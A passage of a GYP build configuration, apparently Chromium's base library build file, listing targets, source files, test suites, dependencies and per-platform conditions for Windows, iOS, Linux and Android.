'prefs/pref_notifier_impl.cc',
'prefs/pref_notifier_impl.h',
'prefs/pref_observer.h',
'prefs/pref_registry.cc',
'prefs/pref_registry.h',
'prefs/pref_registry_simple.cc',
'prefs/pref_registry_simple.h',
'prefs/pref_service.cc',
'prefs/pref_service.h',
'prefs/pref_service_factory.cc',
'prefs/pref_service_factory.h',
'prefs/pref_store.cc',
'prefs/pref_store.h',
'prefs/pref_value_map.cc',
'prefs/pref_value_map.h',
'prefs/pref_value_store.cc',
'prefs/pref_value_store.h',
'prefs/scoped_user_pref_update.cc',
'prefs/scoped_user_pref_update.h',
'prefs/value_map_pref_store.cc',
'prefs/value_map_pref_store.h',
'prefs/writeable_pref_store.h',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'base_prefs_test_support',
'type': 'static_library',
'dependencies': [
'base',
'base_prefs',
'../testing/gmock.gyp:gmock',
],
'sources': [
'prefs/mock_pref_change_callback.cc',
'prefs/pref_store_observer_mock.cc',
'prefs/pref_store_observer_mock.h',
'prefs/testing_pref_service.cc',
'prefs/testing_pref_service.h',
'prefs/testing_pref_store.cc',
'prefs/testing_pref_store.h',
],
},
{
# This is the subset of files from base that should not be used with a
# dynamic library. Note that this library cannot depend on base because
# base depends on base_static.
'target_name': 'base_static',
'type': 'static_library',
'variables': {
'enable_wexit_time_destructors': 1,
'optimize': 'max',
},
'toolsets': ['host', 'target'],
'sources': [
'base_switches.cc',
'base_switches.h',
'win/pe_image.cc',
'win/pe_image.h',
],
'include_dirs': [
'..',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
# Include this target for a main() function that simply instantiates
# and runs a base::TestSuite.
{
'target_name': 'run_all_unittests',
'type': 'static_library',
'dependencies': [
'test_support_base',
],
'sources': [
'test/run_all_unittests.cc',
],
},
{
'target_name': 'base_unittests',
'type': '<(gtest_target_type)',
'sources': [
'allocator/tcmalloc_unittest.cc',
'android/application_status_listener_unittest.cc',
'android/content_uri_utils_unittest.cc',
'android/jni_android_unittest.cc',
'android/jni_array_unittest.cc',
'android/jni_string_unittest.cc',
'android/library_loader/library_prefetcher_unittest.cc',
'android/path_utils_unittest.cc',
'android/scoped_java_ref_unittest.cc',
'android/sys_utils_unittest.cc',
'at_exit_unittest.cc',
'atomicops_unittest.cc',
'barrier_closure_unittest.cc',
'base64_unittest.cc',
'base64url_unittest.cc',
'big_endian_unittest.cc',
'bind_unittest.cc',
'bind_unittest.nc',
'bits_unittest.cc',
'build_time_unittest.cc',
'callback_helpers_unittest.cc',
'callback_list_unittest.cc',
'callback_list_unittest.nc',
'callback_unittest.cc',
'callback_unittest.nc',
'cancelable_callback_unittest.cc',
'command_line_unittest.cc',
'containers/adapters_unittest.cc',
'containers/hash_tables_unittest.cc',
'containers/linked_list_unittest.cc',
'containers/mru_cache_unittest.cc',
'containers/scoped_ptr_hash_map_unittest.cc',
'containers/small_map_unittest.cc',
'containers/stack_container_unittest.cc',
'cpu_unittest.cc',
'debug/crash_logging_unittest.cc',
'debug/debugger_unittest.cc',
'debug/leak_tracker_unittest.cc',
'debug/proc_maps_linux_unittest.cc',
'debug/stack_trace_unittest.cc',
'debug/task_annotator_unittest.cc',
'deferred_sequenced_task_runner_unittest.cc',
'environment_unittest.cc',
'feature_list_unittest.cc',
'file_version_info_unittest.cc',
'files/dir_reader_posix_unittest.cc',
'files/file_locking_unittest.cc',
'files/file_path_unittest.cc',
'files/file_path_watcher_unittest.cc',
'files/file_proxy_unittest.cc',
'files/file_unittest.cc',
'files/file_util_proxy_unittest.cc',
'files/file_util_unittest.cc',
'files/important_file_writer_unittest.cc',
'files/memory_mapped_file_unittest.cc',
'files/scoped_temp_dir_unittest.cc',
'gmock_unittest.cc',
'guid_unittest.cc',
'hash_unittest.cc',
'i18n/break_iterator_unittest.cc',
'i18n/case_conversion_unittest.cc',
'i18n/char_iterator_unittest.cc',
'i18n/file_util_icu_unittest.cc',
'i18n/icu_string_conversions_unittest.cc',
'i18n/message_formatter_unittest.cc',
'i18n/number_formatting_unittest.cc',
'i18n/rtl_unittest.cc',
'i18n/streaming_utf8_validator_unittest.cc',
'i18n/string_search_unittest.cc',
'i18n/time_formatting_unittest.cc',
'i18n/timezone_unittest.cc',
'id_map_unittest.cc',
'ios/crb_protocol_observers_unittest.mm',
'ios/device_util_unittest.mm',
'ios/weak_nsobject_unittest.mm',
'json/json_parser_unittest.cc',
'json/json_reader_unittest.cc',
'json/json_value_converter_unittest.cc',
'json/json_value_serializer_unittest.cc',
'json/json_writer_unittest.cc',
'json/string_escape_unittest.cc',
'lazy_instance_unittest.cc',
'logging_unittest.cc',
'mac/bind_objc_block_unittest.mm',
'mac/call_with_eh_frame_unittest.mm',
'mac/dispatch_source_mach_unittest.cc',
'mac/foundation_util_unittest.mm',
'mac/libdispatch_task_runner_unittest.cc',
'mac/mac_util_unittest.mm',
'mac/objc_property_releaser_unittest.mm',
'mac/scoped_nsobject_unittest.mm',
'mac/scoped_objc_class_swizzler_unittest.mm',
'mac/scoped_sending_event_unittest.mm',
'md5_unittest.cc',
'memory/aligned_memory_unittest.cc',
'memory/discardable_shared_memory_unittest.cc',
'memory/linked_ptr_unittest.cc',
'memory/memory_pressure_listener_unittest.cc',
'memory/memory_pressure_monitor_chromeos_unittest.cc',
'memory/memory_pressure_monitor_mac_unittest.cc',
'memory/memory_pressure_monitor_win_unittest.cc',
'memory/ptr_util_unittest.cc',
'memory/ref_counted_memory_unittest.cc',
'memory/ref_counted_unittest.cc',
'memory/scoped_ptr_unittest.cc',
'memory/scoped_ptr_unittest.nc',
'memory/scoped_vector_unittest.cc',
'memory/shared_memory_unittest.cc',
'memory/shared_memory_mac_unittest.cc',
'memory/singleton_unittest.cc',
'memory/weak_ptr_unittest.cc',
'memory/weak_ptr_unittest.nc',
'message_loop/message_loop_task_runner_unittest.cc',
'message_loop/message_loop_unittest.cc',
'message_loop/message_pump_glib_unittest.cc',
'message_loop/message_pump_io_ios_unittest.cc',
'message_loop/message_pump_libevent_unittest.cc',
'metrics/bucket_ranges_unittest.cc',
'metrics/field_trial_unittest.cc',
'metrics/histogram_base_unittest.cc',
'metrics/histogram_delta_serialization_unittest.cc',
'metrics/histogram_macros_unittest.cc',
'metrics/histogram_snapshot_manager_unittest.cc',
'metrics/histogram_unittest.cc',
'metrics/metrics_hashes_unittest.cc',
'metrics/sample_map_unittest.cc',
'metrics/sample_vector_unittest.cc',
'metrics/sparse_histogram_unittest.cc',
'metrics/statistics_recorder_unittest.cc',
'native_library_unittest.cc',
'numerics/safe_numerics_unittest.cc',
'observer_list_unittest.cc',
'os_compat_android_unittest.cc',
'path_service_unittest.cc',
'pickle_unittest.cc',
'posix/file_descriptor_shuffle_unittest.cc',
'posix/unix_domain_socket_linux_unittest.cc',
'power_monitor/power_monitor_unittest.cc',
'prefs/default_pref_store_unittest.cc',
'prefs/json_pref_store_unittest.cc',
'prefs/mock_pref_change_callback.h',
'prefs/overlay_user_pref_store_unittest.cc',
'prefs/pref_change_registrar_unittest.cc',
'prefs/pref_member_unittest.cc',
'prefs/pref_notifier_impl_unittest.cc',
'prefs/pref_service_unittest.cc',
'prefs/pref_value_map_unittest.cc',
'prefs/pref_value_store_unittest.cc',
'prefs/scoped_user_pref_update_unittest.cc',
'process/memory_unittest.cc',
'process/memory_unittest_mac.h',
'process/memory_unittest_mac.mm',
'process/process_metrics_unittest.cc',
'process/process_metrics_unittest_ios.cc',
'process/process_unittest.cc',
'process/process_util_unittest.cc',
'profiler/stack_sampling_profiler_unittest.cc',
'profiler/tracked_time_unittest.cc',
'rand_util_unittest.cc',
'scoped_clear_errno_unittest.cc',
'scoped_generic_unittest.cc',
'scoped_native_library_unittest.cc',
'security_unittest.cc',
'sequence_checker_unittest.cc',
'sha1_unittest.cc',
'stl_util_unittest.cc',
'strings/nullable_string16_unittest.cc',
'strings/pattern_unittest.cc',
'strings/safe_sprintf_unittest.cc',
'strings/string16_unittest.cc',
'strings/string_number_conversions_unittest.cc',
'strings/string_piece_unittest.cc',
'strings/string_split_unittest.cc',
'strings/string_tokenizer_unittest.cc',
'strings/string_util_unittest.cc',
'strings/stringize_macros_unittest.cc',
'strings/stringprintf_unittest.cc',
'strings/sys_string_conversions_mac_unittest.mm',
'strings/sys_string_conversions_unittest.cc',
'strings/utf_offset_string_conversions_unittest.cc',
'strings/utf_string_conversions_unittest.cc',
'supports_user_data_unittest.cc',
'sync_socket_unittest.cc',
'synchronization/cancellation_flag_unittest.cc',
'synchronization/condition_variable_unittest.cc',
'synchronization/lock_unittest.cc',
'synchronization/waitable_event_unittest.cc',
'synchronization/waitable_event_watcher_unittest.cc',
'sys_info_unittest.cc',
'system_monitor/system_monitor_unittest.cc',
'task/cancelable_task_tracker_unittest.cc',
'task_runner_util_unittest.cc',
'template_util_unittest.cc',
'test/histogram_tester_unittest.cc',
'test/test_pending_task_unittest.cc',
'test/test_reg_util_win_unittest.cc',
'test/trace_event_analyzer_unittest.cc',
'test/user_action_tester_unittest.cc',
'threading/non_thread_safe_unittest.cc',
'threading/platform_thread_unittest.cc',
'threading/sequenced_worker_pool_unittest.cc',
'threading/sequenced_task_runner_handle_unittest.cc',
'threading/simple_thread_unittest.cc',
'threading/thread_checker_unittest.cc',
'threading/thread_collision_warner_unittest.cc',
'threading/thread_id_name_manager_unittest.cc',
'threading/thread_local_storage_unittest.cc',
'threading/thread_local_unittest.cc',
'threading/thread_unittest.cc',
'threading/watchdog_unittest.cc',
'threading/worker_pool_posix_unittest.cc',
'threading/worker_pool_unittest.cc',
'time/pr_time_unittest.cc',
'time/time_unittest.cc',
'time/time_win_unittest.cc',
'timer/hi_res_timer_manager_unittest.cc',
'timer/mock_timer_unittest.cc',
'timer/timer_unittest.cc',
'tools_sanity_unittest.cc',
'tracked_objects_unittest.cc',
'tuple_unittest.cc',
'values_unittest.cc',
'version_unittest.cc',
'vlog_unittest.cc',
'win/dllmain.cc',
'win/enum_variant_unittest.cc',
'win/event_trace_consumer_unittest.cc',
'win/event_trace_controller_unittest.cc',
'win/event_trace_provider_unittest.cc',
'win/i18n_unittest.cc',
'win/iunknown_impl_unittest.cc',
'win/message_window_unittest.cc',
'win/object_watcher_unittest.cc',
'win/pe_image_unittest.cc',
'win/registry_unittest.cc',
'win/scoped_bstr_unittest.cc',
'win/scoped_comptr_unittest.cc',
'win/scoped_handle_unittest.cc',
'win/scoped_process_information_unittest.cc',
'win/scoped_variant_unittest.cc',
'win/shortcut_unittest.cc',
'win/startup_information_unittest.cc',
'win/win_util_unittest.cc',
'win/wrapped_window_proc_unittest.cc',
'<@(trace_event_test_sources)',
],
'dependencies': [
'base',
'base_i18n',
'base_message_loop_tests',
'base_prefs',
'base_prefs_test_support',
'base_static',
'run_all_unittests',
'test_support_base',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
'../third_party/icu/icu.gyp:icui18n',
'../third_party/icu/icu.gyp:icuuc',
],
'includes': ['../build/nocompile.gypi'],
'variables': {
# TODO(ajwong): Is there a way to autodetect this?
'module_dir': 'base'
},
'conditions': [
['OS == "android"', {
'dependencies': [
'android/jni_generator/jni_generator.gyp:jni_generator_tests',
'../testing/android/native_test.gyp:native_test_native_code',
],
}],
['OS == "ios" and _toolset != "host"', {
'sources/': [
# This test needs multiple processes.
['exclude', '^files/file_locking_unittest\\.cc$'],
# iOS does not support FilePathWatcher.
['exclude', '^files/file_path_watcher_unittest\\.cc$'],
# Only test the iOS-meaningful portion of memory and process_utils.
['exclude', '^memory/discardable_shared_memory_unittest\\.cc$'],
['exclude', '^memory/shared_memory_unittest\\.cc$'],
['exclude', '^process/memory_unittest'],
['exclude', '^process/process_unittest\\.cc$'],
['exclude', '^process/process_util_unittest\\.cc$'],
['include', '^process/process_util_unittest_ios\\.cc$'],
# iOS does not use message_pump_libevent.
['exclude', '^message_loop/message_pump_libevent_unittest\\.cc$'],
],
'actions': [
{
'action_name': 'copy_test_data',
'variables': {
'test_data_files': [
'test/data',
],
'test_data_prefix': 'base',
},
'includes': [ '../build/copy_test_data_ios.gypi' ],
},
],
}],
['desktop_linux == 1 or chromeos == 1', {
'defines': [
'USE_SYMBOLIZE',
],
'sources!': [
'file_version_info_unittest.cc',
],
'conditions': [
[ 'desktop_linux==1', {
'sources': [
'nix/xdg_util_unittest.cc',
],
}],
],
}],
['use_glib == 1', {
'dependencies': [
'../build/linux/system.gyp:glib',
],
}, { # use_glib == 0
'sources!': [
'message_loop/message_pump_glib_unittest.cc',
]
}],
['use_ozone == 1', {
'sources!': [
'message_loop/message_pump_glib_unittest.cc',
]
}],
['OS == "linux"', {
'dependencies': [
'malloc_wrapper',
],
'conditions': [
['use_allocator!="none"', {
'dependencies': [
'allocator/allocator.gyp:allocator',
],
}],
]},
],
[ 'OS == "win" and target_arch == "x64"', {
'sources': [
'profiler/win32_stack_frame_unwinder_unittest.cc',
],
'dependencies': [
'base_profiler_test_support_library',
],
}],
['OS == "win"', {
'sources!': [
'file_descriptor_shuffle_unittest.cc',
'files/dir_reader_posix_unittest.cc',
'message_loop/message_pump_libevent_unittest.cc',
'threading/worker_pool_posix_unittest.cc',
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [
4267,
],
'conditions': [
# This is needed so base_unittests uses the allocator shim, as
# SecurityTest.MemoryAllocationRestriction* tests are dependent
# on tcmalloc.
# TODO(wfh): crbug.com/246278 Move tcmalloc specific tests into
# their own test suite.
['win_use_allocator_shim==1', {
'dependencies': [
'allocator/allocator.gyp:allocator',
],
}],
['icu_use_data_file_flag==0', {
# This is needed to trigger the dll copy step on windows.
# TODO(mark): This should not be necessary.
'dependencies': [
'../third_party/icu/icu.gyp:icudata',
],
}],
],
}, { # OS != "win"
'dependencies': [
'third_party/libevent/libevent.gyp:libevent'
],
}],
], # conditions
'target_conditions': [
['OS == "ios" and _toolset != "host"', {
'sources/': [
# Pull in specific Mac files for iOS (which have been filtered out
# by file name rules).
['include', '^mac/bind_objc_block_unittest\\.mm$'],
['include', '^mac/foundation_util_unittest\\.mm$',],
['include', '^mac/objc_property_releaser_unittest\\.mm$'],
['include', '^mac/scoped_nsobject_unittest\\.mm$'],
['include', '^sys_string_conversions_mac_unittest\\.mm$'],
],
}],
['OS == "android"', {
'sources/': [
['include', '^debug/proc_maps_linux_unittest\\.cc$'],
],
}],
# Enable more direct string conversions on platforms with native utf8
# strings
['OS=="mac" or OS=="ios" or <(chromeos)==1 or <(chromecast)==1', {
'defines': ['SYSTEM_NATIVE_UTF8'],
}],
# SyncSocket isn't used on iOS
['OS=="ios"', {
'sources!': [
'sync_socket_unittest.cc',
],
}],
], # target_conditions
},
{
# GN: //base:base_perftests
'target_name': 'base_perftests',
'type': '<(gtest_target_type)',
'dependencies': [
'base',
'test_support_base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'message_loop/message_pump_perftest.cc',
'test/run_all_unittests.cc',
'threading/thread_perftest.cc',
'../testing/perf/perf_test.cc'
],
'conditions': [
['OS == "android"', {
'dependencies': [
'../testing/android/native_test.gyp:native_test_native_code',
],
}],
],
},
{
# GN: //base:base_i18n_perftests
'target_name': 'base_i18n_perftests',
'type': '<(gtest_target_type)',
'dependencies': [
'test_support_base',
'test_support_perf',
'../testing/gtest.gyp:gtest',
'base_i18n',
'base',
],
'sources': [
'i18n/streaming_utf8_validator_perftest.cc',
],
},
{
# GN: //base/test:test_support
'target_name': 'test_support_base',
'type': 'static_library',
'dependencies': [
'base',
'base_static',
'base_i18n',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
'../third_party/icu/icu.gyp:icuuc',
'../third_party/libxml/libxml.gyp:libxml',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
],
'export_dependent_settings': [
'base',
],
'conditions': [
['os_posix==0', {
'sources!': [
'test/scoped_locale.cc',
'test/scoped_locale.h',
],
}],
['os_bsd==1', {
'sources!': [
'test/test_file_util_linux.cc',
],
}],
['OS == "android"', {
'dependencies': [
'base_unittests_jni_headers',
'base_java_unittest_support',
],
}],
['OS == "ios"', {
'toolsets': ['host', 'target'],
}],
],
'sources': [
'test/gtest_util.cc',
'test/gtest_util.h',
'test/gtest_xml_unittest_result_printer.cc',
'test/gtest_xml_unittest_result_printer.h',
'test/gtest_xml_util.cc',
'test/gtest_xml_util.h',
'test/histogram_tester.cc',
'test/histogram_tester.h',
'test/icu_test_util.cc',
'test/icu_test_util.h',
'test/ios/wait_util.h',
'test/ios/wait_util.mm',
'test/launcher/test_launcher.cc',
'test/launcher/test_launcher.h',
'test/launcher/test_result.cc',
'test/launcher/test_result.h',
'test/launcher/test_results_tracker.cc',
'test/launcher/test_results_tracker.h',
'test/launcher/unit_test_launcher.cc',
'test/launcher/unit_test_launcher.h',
'test/launcher/unit_test_launcher_ios.cc',
'test/mock_chrome_application_mac.h',
'test/mock_chrome_application_mac.mm',
'test/mock_devices_changed_observer.cc',
'test/mock_devices_changed_observer.h',
'test/mock_entropy_provider.cc',
'test/mock_entropy_provider.h',
'test/mock_log.cc',
'test/mock_log.h',
'test/multiprocess_test.cc',
'test/multiprocess_test.h',
'test/multiprocess_test_android.cc',
'test/null_task_runner.cc',
'test/null_task_runner.h',
'test/opaque_ref_counted.cc',
'test/opaque_ref_counted.h',
'test/perf_log.cc',
'test/perf_log.h',
'test/perf_test_suite.cc',
'test/perf_test_suite.h',
'test/perf_time_logger.cc',
'test/perf_time_logger.h',
'test/power_monitor_test_base.cc',
'test/power_monitor_test_base.h',
'test/scoped_locale.cc',
'test/scoped_locale.h',
'test/scoped_path_override.cc',
'test/scoped_path_override.h',
'test/sequenced_task_runner_test_template.cc',
'test/sequenced_task_runner_test_template.h',
'test/sequenced_worker_pool_owner.cc',
'test/sequenced_worker_pool_owner.h',
'test/simple_test_clock.cc',
'test/simple_test_clock.h',
'test/simple_test_tick_clock.cc',
'test/simple_test_tick_clock.h',
'test/task_runner_test_template.cc',
'test/task_runner_test_template.h',
'test/test_discardable_memory_allocator.cc',
'test/test_discardable_memory_allocator.h',
'test/test_file_util.cc',
'test/test_file_util.h',
'test/test_file_util_android.cc',
'test/test_file_util_linux.cc',
'test/test_file_util_mac.cc',
'test/test_file_util_posix.cc',
'test/test_file_util_win.cc',
'test/test_io_thread.cc',
'test/test_io_thread.h',
'test/test_listener_ios.h',
'test/test_listener_ios.mm',
'test/test_mock_time_task_runner.cc',
'test/test_mock_time_task_runner.h',
'test/test_pending_task.cc',
'test/test_pending_task.h',
'test/test_reg_util_win.cc',
'test/test_reg_util_win.h',
'test/test_shortcut_win.cc',
'test/test_shortcut_win.h',
'test/test_simple_task_runner.cc',
'test/test_simple_task_runner.h',
'test/test_suite.cc',
'test/test_suite.h',
'test/test_support_android.cc',
'test/test_support_android.h',
'test/test_support_ios.h',
'test/test_support_ios.mm',
'test/test_switches.cc',
'test/test_switches.h',
'test/test_timeouts.cc',
'test/test_timeouts.h',
'test/test_ui_thread_android.cc',
'test/test_ui_thread_android.h',
'test/thread_test_helper.cc',
'test/thread_test_helper.h',
'test/trace_event_analyzer.cc',
'test/trace_event_analyzer.h',
'test/trace_to_file.cc',
'test/trace_to_file.h',
'test/user_action_tester.cc',
'test/user_action_tester.h',
'test/values_test_util.cc',
'test/values_test_util.h',
],
'target_conditions': [
['OS == "ios"', {
'sources/': [
# Pull in specific Mac files for iOS (which have been filtered out
# by file name rules).
['include', '^test/test_file_util_mac\\.cc$'],
],
}],
['OS == "ios" and _toolset == "target"', {
'sources!': [
# iOS uses its own unit test launcher.
'test/launcher/unit_test_launcher.cc',
],
}],
['OS == "ios" and _toolset == "host"', {
'sources!': [
'test/launcher/unit_test_launcher_ios.cc',
'test/test_support_ios.h',
'test/test_support_ios.mm',
],
}],
], # target_conditions
},
{
'target_name': 'test_support_perf',
'type': 'static_library',
'dependencies': [
'base',
'test_support_base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'test/run_all_perftests.cc',
],
'direct_dependent_settings': {
'defines': [
'PERF_TEST',
],
},
},
{
'target_name': 'test_launcher_nacl_nonsfi',
'conditions': [
['disable_nacl==0 and disable_nacl_untrusted==0 and enable_nacl_nonsfi_test==1', {
'type': 'static_library',
'sources': [
'test/launcher/test_launcher_nacl_nonsfi.cc',
],
'dependencies': [
'test_support_base',
],
}, {
'type': 'none',
}],
],
},
{
# GN version: //base/debug:debugging_flags
# Since this generates a file, it most only be referenced in the target
# toolchain or there will be multiple rules that generate the header.
# When referenced from a target that might be compiled in the host
# toolchain, always refer to 'base_debugging_flags#target'.
'target_name': 'base_debugging_flags',
'includes': [ '../build/buildflag_header.gypi' ],
'variables': {
'buildflag_header_path': 'base/debug/debugging_flags.h',
'buildflag_flags': [
'ENABLE_PROFILING=<(profiling)',
],
},
},
],
'conditions': [
['OS=="ios" and "<(GENERATOR)"=="ninja"', {
'targets': [
{
'target_name': 'test_launcher',
'toolsets': ['host'],
'type': 'executable',
'dependencies': [
'test_support_base',
],
'sources': [
'test/launcher/test_launcher_ios.cc',
],
},
],
}],
['OS!="ios"', {
'targets': [
{
# GN: //base:check_example
'target_name': 'check_example',
'type': 'executable',
'sources': [
'check_example.cc',
],
'dependencies': [
'base',
],
},
{
'target_name': 'build_utf8_validator_tables',
'type': 'executable',
'toolsets': ['host'],
'dependencies': [
'base',
'../third_party/icu/icu.gyp:icuuc',
],
'sources': [
'i18n/build_utf8_validator_tables.cc'
],
},
],
}],
['OS == "win" and target_arch=="ia32"', {
'targets': [
# The base_win64 target here allows us to use base for Win64 targets
# (the normal build is 32 bits).
{
'target_name': 'base_win64',
'type': '<(component)',
'variables': {
'base_target': 1,
},
'dependencies': [
'base_debugging_flags#target',
'base_static_win64',
'../third_party/modp_b64/modp_b64.gyp:modp_b64_win64',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations_win64',
'trace_event/etw_manifest/etw_manifest.gyp:etw_manifest',
],
# TODO(gregoryd): direct_dependent_settings should be shared with the
# 32-bit target, but it doesn't work due to a bug in gyp
'direct_dependent_settings': {
'include_dirs': [
'..',
],
},
'defines': [
'BASE_WIN64',
'<@(nacl_win64_defines)',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'conditions': [
['component == "shared_library"', {
'sources!': [
'debug/debug_on_start_win.cc',
],
}],
],
# Specify delayload for base_win64.dll.
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
# Specify delayload for components that link with base_win64.lib.
'all_dependent_settings': {
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
},
# TODO(rvargas): Bug 78117. Remove this.
'msvs_disabled_warnings': [
4244,
4996,
4267,
],
'sources': [
'auto_reset.h',
'linux_util.cc',
'linux_util.h',
'md5.cc',
'md5.h',
'message_loop/message_pump_libevent.cc',
'message_loop/message_pump_libevent.h',
'metrics/field_trial.cc',
'metrics/field_trial.h',
'posix/file_descriptor_shuffle.cc',
'posix/file_descriptor_shuffle.h',
'sync_socket.h',
'sync_socket_posix.cc',
'sync_socket_win.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.h',
],
},
{
'target_name': 'base_i18n_nacl_win64',
'type': '<(component)',
# TODO(gregoryd): direct_dependent_settings should be shared with the
# 32-bit target, but it doesn't work due to a bug in gyp
'direct_dependent_settings': {
'include_dirs': [
'..',
],
},
'defines': [
'<@(nacl_win64_defines)',
'BASE_I18N_IMPLEMENTATION',
],
'include_dirs': [
'..',
],
'sources': [
'i18n/icu_util_nacl_win64.cc',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
},
{
# TODO(rvargas): Remove this when gyp finally supports a clean model.
# See bug 36232.
'target_name': 'base_static_win64',
'type': 'static_library',
'sources': [
'base_switches.cc',
'base_switches.h',
'win/pe_image.cc',
'win/pe_image.h',
],
'sources!': [
# base64.cc depends on modp_b64.
'base64.cc',
],
'include_dirs': [
'..',
],
'configurations': {
'Common_Base': {
'msvs_target_platform': 'x64',
},
},
'defines': [
'<@(nacl_win64_defines)',
],
# TODO(rvargas): Bug 78117. Remove this.
'msvs_disabled_warnings': [
4244,
],
},
],
}],
['OS == "win" and target_arch=="x64"', {
'targets': [
{
'target_name': 'base_profiler_test_support_library',
# Must be a shared library so that it can be unloaded during testing.
'type': 'shared_library',
'include_dirs': [
'..',
],
'sources': [
'profiler/test_support_library.cc',
],
},
]
}],
['os_posix==1 and OS!="mac" and OS!="ios"', {
'targets': [
{
'target_name': 'symbolize',
'type': 'static_library',
'toolsets': ['host', 'target'],
'variables': {
'chromium_code': 0,
},
'conditions': [
['OS == "solaris"', {
'include_dirs': [
'/usr/gnu/include',
'/usr/gnu/include/libelf',
],
},],
],
'cflags': [
'-Wno-sign-compare',
],
'cflags!': [
'-Wextra',
],
'defines': [
'GLOG_BUILD_CONFIG_INCLUDE="build/build_config.h"',
],
'sources': [
'third_party/symbolize/config.h',
'third_party/symbolize/demangle.cc',
'third_party/symbolize/demangle.h',
'third_party/symbolize/glog/logging.h',
'third_party/symbolize/glog/raw_logging.h',
'third_party/symbolize/symbolize.cc',
'third_party/symbolize/symbolize.h',
'third_party/symbolize/utilities.h',
],
'include_dirs': [
'..',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'xdg_mime',
'type': 'static_library',
'toolsets': ['host', 'target'],
'variables': {
'chromium_code': 0,
},
'cflags!': [
'-Wextra',
],
'sources': [
'third_party/xdg_mime/xdgmime.c',
'third_party/xdg_mime/xdgmime.h',
'third_party/xdg_mime/xdgmimealias.c',
'third_party/xdg_mime/xdgmimealias.h',
'third_party/xdg_mime/xdgmimecache.c',
'third_party/xdg_mime/xdgmimecache.h',
'third_party/xdg_mime/xdgmimeglob.c',
'third_party/xdg_mime/xdgmimeglob.h',
'third_party/xdg_mime/xdgmimeicon.c',
'third_party/xdg_mime/xdgmimeicon.h',
'third_party/xdg_mime/xdgmimeint.c',
'third_party/xdg_mime/xdgmimeint.h',
'third_party/xdg_mime/xdgmimemagic.c',
'third_party/xdg_mime/xdgmimemagic.h',
'third_party/xdg_mime/xdgmimeparent.c',
'third_party/xdg_mime/xdgmimeparent.h',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
],
}],
['OS == "linux"', {
'targets': [
{
'target_name': 'malloc_wrapper',
'type': 'shared_library',
'dependencies': [
'base',
],
'sources': [
'test/malloc_wrapper.cc',
],
}
],
}],
['OS == "android"', {
'targets': [
{
# GN: //base:base_jni_headers
'target_name': 'base_jni_headers',
'type': 'none',
'sources': [
'android/java/src/org/chromium/base/ApkAssets.java',
'android/java/src/org/chromium/base/ApplicationStatus.java',
'android/java/src/org/chromium/base/AnimationFrameTimeHistogram.java',
'android/java/src/org/chromium/base/BuildInfo.java',
'android/java/src/org/chromium/base/CommandLine.java',
'android/java/src/org/chromium/base/ContentUriUtils.java',
'android/java/src/org/chromium/base/ContextUtils.java',
'android/java/src/org/chromium/base/CpuFeatures.java',
'android/java/src/org/chromium/base/EventLog.java',
'android/java/src/org/chromium/base/FieldTrialList.java',
'android/java/src/org/chromium/base/ImportantFileWriterAndroid.java',
'android/java/src/org/chromium/base/JNIUtils.java',
'android/java/src/org/chromium/base/JavaHandlerThread.java',
'android/java/src/org/chromium/base/LocaleUtils.java',
'android/java/src/org/chromium/base/MemoryPressureListener.java',
'android/java/src/org/chromium/base/PathService.java',
'android/java/src/org/chromium/base/PathUtils.java',
'android/java/src/org/chromium/base/PowerMonitor.java',
'android/java/src/org/chromium/base/SysUtils.java',
'android/java/src/org/chromium/base/SystemMessageHandler.java',
'android/java/src/org/chromium/base/ThreadUtils.java',
'android/java/src/org/chromium/base/TraceEvent.java',
'android/java/src/org/chromium/base/library_loader/LibraryLoader.java',
'android/java/src/org/chromium/base/metrics/RecordHistogram.java',
'android/java/src/org/chromium/base/metrics/RecordUserAction.java',
],
'variables': {
'jni_gen_package': 'base',
},
'dependencies': [
'android_runtime_jni_headers',
],
'includes': [ '../build/jni_generator.gypi' ],
},
{
# GN: //base:android_runtime_jni_headers
'target_name': 'android_runtime_jni_headers',
'type': 'none',
'variables': {
'jni_gen_package': 'base',
'input_java_class': 'java/lang/Runtime.class',
},
'includes': [ '../build/jar_file_jni_generator.gypi' ],
},
{
# GN: //base:base_unittests_jni_headers
'target_name': 'base_unittests_jni_headers',
'type': 'none',
'sources': [
'test/android/java/src/org/chromium/base/ContentUriTestUtils.java',
'test/android/java/src/org/chromium/base/TestUiThread.java',
],
'variables': {
'jni_gen_package': 'base',
},
'includes': [ '../build/jni_generator.gypi' ],
},
{
# GN: //base:base_native_libraries_gen
'target_name': 'base_native_libraries_gen',
'type': 'none',
'sources': [
'android/java/templates/NativeLibraries.template',
],
'variables': {
'package_name': 'org/chromium/base/library_loader',
'template_deps': [],
},
'includes': [ '../build/android/java_cpp_template.gypi' ],
},
{
# GN: //base:base_multidex_gen
'target_name': 'base_multidex_gen',
'type': 'none',
'sources': [
'android/java/templates/ChromiumMultiDex.template',
],
'variables': {
'package_name': 'org/chromium/base/multidex',
'template_deps': [],
'additional_gcc_preprocess_options': [
'--defines', 'MULTIDEX_CONFIGURATION_<(CONFIGURATION_NAME)',
],
},
